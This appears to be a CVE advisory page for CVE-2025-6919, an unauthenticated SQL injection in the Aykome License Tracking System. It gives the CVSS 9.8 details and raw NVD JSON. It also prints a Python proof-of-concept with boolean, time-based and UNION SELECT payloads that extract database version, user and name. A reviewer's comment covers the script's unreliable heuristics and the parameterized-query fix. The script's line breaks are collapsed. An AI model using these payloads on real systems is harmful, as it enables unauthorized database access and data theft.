Security Vulnerability Report
CVE-2025-6919 CVSS 9.8 CRITICAL

CVE-2025-6919

Published: 2025-10-13 13:15:33
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cats Information Technology Software Development Technologies Aykome License Tracking System allows SQL Injection. This issue affects Aykome License Tracking System: before Version dated 06.10.2025.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cats Information Technology Aykome License Tracking System < version dated 2025-10-06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# NOTE(review): this listing lost its line breaks when the page was rendered, so
# the two physical lines below are not runnable Python as shown; read them as a
# collapsed script, not as code to paste.
# What the collapsed script does, per its own text: it probes one query
# parameter (default "id") of a placeholder TARGET_URL with three textbook
# CWE-89 checks — a boolean pair ("1' OR '1'='1" vs "1' OR '1'='2") compared by
# response length, a time-based probe using SLEEP(5) judged by elapsed >= 5 s,
# and a UNION SELECT with numbered columns followed by a request for
# version()/current_user()/database() (MySQL/MariaDB-style functions, which
# presumably hints at the backend — not confirmed anywhere on this page).
# Reviewer caveats for anyone assessing the report:
#  - Every "[+] ... detected"/"successful" verdict is a heuristic (response-length
#    delta plus HTTP 200, wall-clock >= 5 s, HTTP 200 without the word "error"),
#    so dynamic page content, a slow network or a generic error handler produces
#    false positives and false negatives; treat the script's output as a hint,
#    not as confirmation of the CVE.
#  - The broad `except Exception` collapses connection errors, timeouts and
#    genuine bugs into one "[-] Error" line, and `import time` sits inside the
#    function body rather than at the top of the file.
#  - Defensive takeaway: the root cause (CWE-89, per the Raw JSON below) is
#    fixed server-side with parameterized queries on the affected parameter,
#    not by blocking the strings above; those literal payloads are, however,
#    directly usable as WAF / access-log detection signatures for this
#    endpoint.
# CVE-2025-6919 - Aykome License Tracking System SQL Injection PoC # Vulnerability: Unauthenticated SQL Injection via improper input neutralization # Affected: Aykome License Tracking System before version dated 06.10.2025 import requests import sys TARGET_URL = "http://target-host/path-to-vulnerable-endpoint" def detect_sql_injection(url, param_name="id"): """Detect SQL injection vulnerability""" # Normal request normal_payload = "1" # Boolean-based test payload true_payload = "1' OR '1'='1" false_payload = "1' OR '1'='2" try: # Test for boolean-based blind SQLi r_true = requests.get(url, params={param_name: true_payload}, timeout=10) r_false = requests.get(url, params={param_name: false_payload}, timeout=10) if len(r_true.text) != len(r_false.text) and r_true.status_code == 200: print(f"[+] Boolean-based SQLi detected at parameter: {param_name}") return True # Test for time-based blind SQLi time_payload = "1' AND SLEEP(5)-- -" import time start = time.time() requests.get(url, params={param_name: time_payload}, timeout=15) elapsed = time.time() - start if elapsed >= 5: print(f"[+] Time-based SQLi detected at parameter: {param_name}") return True except Exception as e: print(f"[-] Error during detection: {e}") return False def exploit_union_sqli(url, param_name="id", columns=5): """Exploit UNION-based SQL injection to extract data""" # Build UNION SELECT payload nulls = ",".join([str(i) for i in range(1, columns + 1)]) union_payload = f"-1' UNION SELECT {nulls}-- -" try: r = requests.get(url, params={param_name: union_payload}, timeout=10) if r.status_code == 200: print(f"[+] UNION injection successful") print(f"[+] Response: {r.text[:500]}") return r.text except Exception as e: print(f"[-] Exploitation error: {e}") return None def extract_database_info(url, param_name="id"): """Extract database version and current user via SQLi""" payload = "-1' UNION SELECT 1,version(),current_user(),database(),5-- -" try: r = requests.get(url, params={param_name: payload}, 
timeout=10) if r.status_code == 200 and "error" not in r.text.lower(): print(f"[+] Database info extracted") return r.text except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print(f"[*] Testing target: {TARGET_URL}") if detect_sql_injection(TARGET_URL): print("[*] Attempting data extraction...") exploit_union_sqli(TARGET_URL) extract_database_info(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6919", "sourceIdentifier": "[email protected]", "published": "2025-10-13T13:15:32.617", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cats Information Technology Software Development Technologies Aykome License Tracking System allows SQL Injection.This issue affects Aykome License Tracking System: before Version dated 06.10.2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0332", "source": "[email protected]"}]}}